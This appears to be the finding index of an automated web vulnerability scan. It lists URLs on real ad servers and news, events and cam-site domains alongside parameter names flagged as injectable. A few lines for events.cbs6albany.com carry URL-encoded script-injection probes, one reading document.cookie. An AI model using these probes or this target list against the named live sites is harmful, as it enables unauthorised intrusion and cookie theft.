http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [forced_click parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [m parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [mid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [sz parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.7 [tp parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [c parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [forced_click parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [m parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [mid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sid parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [sz parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter]
http://ad.doubleclick.net/adj/N4406.Valueclick/B5146746.8 [tp parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [c parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [forced_click parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [m parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [mid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [sz parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B4898428.3 [tp parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [c parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [forced_click parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [m parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [mid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sid parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [sz parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter]
http://ad.doubleclick.net/adj/N763.Valueclick/B5189085.13 [tp parameter]
http://ad.doubleclick.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2]
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3]
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4]
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]
http://ad.doubleclick.net.57389.9231.302br.net/jsi/adi/N4682.132309.BURSTMEDIA/B4421704.7 [sz parameter]
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 2]
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 3]
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [REST URL parameter 4]
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [abr parameter]
http://ad.doubleclick.net.57390.9231.302br.net/jss/adj/N4682.132309.BURSTMEDIA/B4421704.7 [name of an arbitrarily supplied request parameter]
http://ad.turn.com/server/pixel.htm [fpid parameter]
http://ads.adxpose.com/ads/ads.js [uid parameter]
http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]
http://ads.roiserver.com/tag.jsp [h parameter]
http://ads.roiserver.com/tag.jsp [pid parameter]
http://ads.roiserver.com/tag.jsp [w parameter]
http://adsfac.us/ag.asp [cc parameter]
http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]
http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]
http://ar.imlive.com/ [name of an arbitrarily supplied request parameter]
http://ar.imlive.com/waccess/ [cbname parameter]
http://ar.imlive.com/waccess/ [from parameter]
http://ar.imlive.com/waccess/ [promocode parameter]
http://ar.voicefive.com/b/rc.pli [func parameter]
http://ar.voicefive.com/bmx3/broker.pli [AR_C parameter]
http://ar.voicefive.com/bmx3/broker.pli [PRAd parameter]
http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 1]
http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 2]
http://assets.nydailynews.com/css/20090601/nydn_homepage.css [REST URL parameter 3]
http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 1]
http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 2]
http://assets.nydailynews.com/css/20101001/nydn_global.css [REST URL parameter 3]
http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 1]
http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 2]
http://assets.nydailynews.com/css/20101001/nydn_section.css [REST URL parameter 3]
http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 1]
http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 2]
http://assets.nydailynews.com/css/20101001/nydn_wrapper.css [REST URL parameter 3]
http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 1]
http://assets.nydailynews.com/css/thickbox.css [REST URL parameter 2]
http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 1]
http://assets.nydailynews.com/js/nydn-pack-20101001.js [REST URL parameter 2]
http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 1]
http://assets.nydailynews.com/js/thickbox.js [REST URL parameter 2]
http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 1]
http://assets.nydailynews.com/js/webtrends.js [REST URL parameter 2]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c10 parameter]
http://b.scorecardresearch.com/beacon.js [c15 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 2]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 3]
http://b3.mookie1.com/2/B3DM/DLX/1@x71 [REST URL parameter 4]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 2]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 3]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 4]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 5]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 6]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90 [REST URL parameter 7]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 2]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 3]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 4]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 5]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 6]
http://b3.mookie1.com/2/CollectiveB3/ATTWL/11Q1/MobRON/300/1[timestamp]@x90/ [REST URL parameter 7]
http://base.liveperson.net/hc/5296924/cmd/url/ [page parameter]
https://base.liveperson.net/hc/5296924/ [REST URL parameter 2]
https://base.liveperson.net/hc/5296924/ [lpCallId parameter]
http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
http://bh.heraldinteractive.com/includes/processAds.bg [companion parameter]
http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
http://bh.heraldinteractive.com/includes/processAds.bg [page parameter]
http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
http://bh.heraldinteractive.com/includes/processAds.bg [position parameter]
http://boston30.autochooser.com/results.asp [name of an arbitrarily supplied request parameter]
http://boston30.autochooser.com/results.asp [pagename parameter]
http://boston30.autochooser.com/results.asp [postto parameter]
http://bostonherald.com/news/document.bg [f parameter]
http://bostonherald.com/news/document.bg [h parameter]
http://bostonherald.com/search/ [topic parameter]
http://bostonherald.com/search/ [topic parameter]
http://bostonherald.com/track/inside_track/view.bg [format parameter]
http://bostonherald.com/track/star_tracks/view.bg [format parameter]
http://br.imlive.com/ [name of an arbitrarily supplied request parameter]
http://br.imlive.com/ [name of an arbitrarily supplied request parameter]
http://br.imlive.com/ [name of an arbitrarily supplied request parameter]
http://br.imlive.com/waccess/ [cbname parameter]
http://br.imlive.com/waccess/ [from parameter]
http://br.imlive.com/waccess/ [gotopage parameter]
http://br.imlive.com/waccess/ [promocode parameter]
http://c.brightcove.com/services/messagebroker/amf [3rd AMF string parameter]
http://c.chango.com/collector/tag.js [partnerId parameter]
http://c.chango.com/collector/tag.js [referrerURL parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [c parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [l parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [l parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]
http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]
http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://cafr.imlive.com/ [name of an arbitrarily supplied request parameter]
http://cafr.imlive.com/waccess/ [cbname parameter]
http://cafr.imlive.com/waccess/ [from parameter]
http://cafr.imlive.com/waccess/ [gotopage parameter]
http://cafr.imlive.com/waccess/ [promocode parameter]
http://cbs6albany.oodle.com/ [name of an arbitrarily supplied request parameter]
http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter]
http://common.cdn.onset.freedom.com/common/tools/load.php [js parameter]
http://common.cdn.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]
http://common.onset.freedom.com/common/tools/load.php [js parameter]
http://common.onset.freedom.com/common/tools/load.php [js parameter]
http://common.onset.freedom.com/common/tools/load.php [name of an arbitrarily supplied request parameter]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 10]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 11]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 4]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 5]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 6]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 7]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 8]
http://d3.zedo.com//ads2/k/602889/3869/172/0/951000002/951000002/0/951/2//1000014/i.js [REST URL parameter 9]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [name of an arbitrarily supplied request parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]
http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js [q parameter]
http://de.imlive.com/ [name of an arbitrarily supplied request parameter]
http://de.imlive.com/ [name of an arbitrarily supplied request parameter]
http://de.imlive.com/waccess/ [cbname parameter]
http://de.imlive.com/waccess/ [from parameter]
http://de.imlive.com/waccess/ [gotopage parameter]
http://de.imlive.com/waccess/ [promocode parameter]
http://digg.com/submit [REST URL parameter 1]
http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]
http://dk.imlive.com/ [name of an arbitrarily supplied request parameter]
http://dk.imlive.com/waccess/ [cbname parameter]
http://dk.imlive.com/waccess/ [from parameter]
http://dk.imlive.com/waccess/ [gotopage parameter]
http://dk.imlive.com/waccess/ [promocode parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11170717655@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [USNetwork/ATTWL_11Q1_Cllctv_MobRON_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1120619784@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11419206302@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11452529046@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11819507567@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11824141209@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_160 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/11940003036@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/12000985820@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/12037650882@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1334085935@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1394936567@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1636403816@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1670623313@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1874556783@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [USNetwork/FarmD_2011Q1_TRIBALF_A_TX_300 parameter]
http://dm.de.mookie1.com/2/B3DM/2010DM/1902448725@x23 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [REST URL parameter 4]
http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [na_id parameter]
http://dm.de.mookie1.com/2/B3DM/DLX/11678985058@x95 [name of an arbitrarily supplied request parameter]
http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 2]
http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 3]
http://dm.de.mookie1.com/2/B3DM/DLX/@x94 [REST URL parameter 4]
http://es.imlive.com/ [name of an arbitrarily supplied request parameter]
http://es.imlive.com/ [name of an arbitrarily supplied request parameter]
http://es.imlive.com/waccess/ [cbname parameter]
http://es.imlive.com/waccess/ [from parameter]
http://es.imlive.com/waccess/ [gotopage parameter]
http://es.imlive.com/waccess/ [promocode parameter]
http://event.adxpose.com/event.flow [uid parameter]
http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter]
http://events.cbs6albany.com/ [376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter]
http://events.cbs6albany.com/ [376e5%22%3e%3cscript%3ealert(1 parameter]
http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/events [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/events/business+tech [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 1]
http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3]
http://events.cbs6albany.com/albany-ny/events/performing+arts [REST URL parameter 3]
http://events.cbs6albany.com/albany-ny/events/performing+arts [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 1]
http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 3]
http://events.cbs6albany.com/albany-ny/events/visual+arts [REST URL parameter 3]
http://events.cbs6albany.com/albany-ny/events/visual+arts [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/movies [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/restaurants [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/albany-ny/venues [REST URL parameter 1]
http://events.cbs6albany.com/albany-ny/venues [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/glens-falls-ny/venues/show/185044-glens-falls-civic-center [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/261885-127-hours [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/272945-black-swan [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/299065-the-kings-speech [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/324545-true-grit [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/344645-no-strings-attached [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/346845-sanctum-3d [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/movies/show/354805-sanctum [name of an arbitrarily supplied request parameter]
http://events.cbs6albany.com/search [st parameter]
http://events.cbs6albany.com/search [st parameter]
http://events.cbs6albany.com/search [st parameter]
http://events.cbs6albany.com/search [st parameter]
http://events.cbs6albany.com/search [swhen parameter]
